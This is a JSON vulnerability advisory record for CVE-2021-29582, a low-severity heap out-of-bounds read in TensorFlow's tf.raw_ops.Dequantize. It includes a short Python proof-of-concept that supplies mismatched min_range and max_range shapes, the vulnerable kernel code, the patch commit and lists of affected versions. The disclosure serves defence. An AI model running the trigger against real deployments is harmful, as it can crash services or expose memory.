{"id":"GHSA-c45w-2wxr-pp53","summary":"Heap OOB read in `tf.raw_ops.Dequantize`","details":"### Impact\nDue to a lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read outside the bounds of heap-allocated data:\n\n```python\nimport tensorflow as tf\n\ninput_tensor=tf.constant(\n  [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\\\n  -10, -10, -10, -10], shape=[5, 10], dtype=tf.int32)\ninput_tensor=tf.cast(input_tensor, dtype=tf.quint8)\nmin_range = tf.constant([-10], shape=[1], dtype=tf.float32)\nmax_range = tf.constant([24, 758, 758, 758, 758], shape=[5], dtype=tf.float32)\n  \ntf.raw_ops.Dequantize( \n  input=input_tensor, min_range=min_range, max_range=max_range, mode='SCALED',\n  narrow_range=True, axis=0, dtype=tf.dtypes.float32)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/26003593aa94b1742f34dc22ce88a1e17776a67d/tensorflow/core/kernels/dequantize_op.cc#L106-L131) accesses the `min_range` and `max_range` tensors in parallel but fails to check that they have the same shape:\n\n```cc\nif (num_slices == 1) {\n  const float min_range = input_min_tensor.flat\u003cfloat\u003e()(0);\n  const float max_range = input_max_tensor.flat\u003cfloat\u003e()(0);\n  DequantizeTensor(ctx, input, min_range, max_range, &float_output);\n} else {\n  ...\n  auto min_ranges = input_min_tensor.vec\u003cfloat\u003e();\n  auto max_ranges = input_max_tensor.vec\u003cfloat\u003e();\n  for (int i = 0; i \u003c num_slices; ++i) {\n    DequantizeSlice(ctx-\u003eeigen_device\u003cDevice\u003e(), ctx,\n                    input_tensor.template chip\u003c1\u003e(i), min_ranges(i),\n                    max_ranges(i), output_tensor.template chip\u003c1\u003e(i));\n    ...\n  }\n}\n```\n\n### Patches\nWe have patched the issue in GitHub commit 
[5899741d0421391ca878da47907b1452f06aaf1b](https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherry-pick this commit onto TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in the supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability was reported by Yakun Zhang and Ying Wang of Baidu X-Team.","aliases":["BIT-tensorflow-2021-29582","CVE-2021-29582","PYSEC-2021-219","PYSEC-2021-510","PYSEC-2021-708"],"modified":"2026-03-13T22:14:15.407645Z","published":"2021-05-21T14:26:32Z","related":["CVE-2021-29582"],"database_specific":{"nvd_published_at":"2021-05-14T20:15:00Z","github_reviewed_at":"2021-05-18T17:47:11Z","github_reviewed":true,"cwe_ids":["CWE-125"],"severity":"LOW"},"references":[{"type":"WEB","url":"https://github.com/tensorflow/tensorflow/security/advisories/GHSA-c45w-2wxr-pp53"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-29582"},{"type":"WEB","url":"https://github.com/tensorflow/tensorflow/commit/5899741d0421391ca878da47907b1452f06aaf1b"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-510.yaml"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-708.yaml"},{"type":"WEB","url":"https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-219.yaml"},{"type":"PACKAGE","url":"https://github.com/tensorflow/tensorflow"}],"affected":[{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["0.12.0","0.12.1","1.0.0"
,"1.0.1","1.1.0","1.10.0","1.10.1","1.11.0","1.12.0","1.12.2","1.12.3","1.13.1","1.13.2","1.14.0","1.15.0","1.15.2","1.15.3","1.15.4","1.15.5","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.5.0","1.5.1","1.6.0","1.7.0","1.7.1","1.8.0","1.9.0","2.0.0","2.0.1","2.0.2","2.0.3","2.0.4","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["1.15.0","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorf
low-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-cpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-cpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"2.1.4"}]}],"versions":["0.12.0","0.12.1","1.0.0","1.0.1","1.1.0","1.10.0","1.10.1","1.11.0","1.12.0","1.12.2","1.12.3","1.13.1","1.13.2","1.14.0","1.15.0","1.15.2","1.15.3","1.15.4","1.15.5","1.2.0","1.2.1","1.3.0","1.4.0","1.4.1","1.5.0","1.5.1","1.6.0","1.7.0","1.7.1","1.8.0","1.9.0","2.0.0","2.0.1","2.0.2","2.0.3","2.0.4","2.1.0","2.1.1","2.1.2","2.1.3"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.2.0"},{"fixed":"2.2.3"}]}],"versions":["2.2.0","2.2.1","2.2.2"],"data
base_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.3.0"},{"fixed":"2.3.3"}]}],"versions":["2.3.0","2.3.1","2.3.2"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}},{"package":{"name":"tensorflow-gpu","ecosystem":"PyPI","purl":"pkg:pypi/tensorflow-gpu"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2.4.0"},{"fixed":"2.4.2"}]}],"versions":["2.4.0","2.4.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-c45w-2wxr-pp53/GHSA-c45w-2wxr-pp53.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"}]}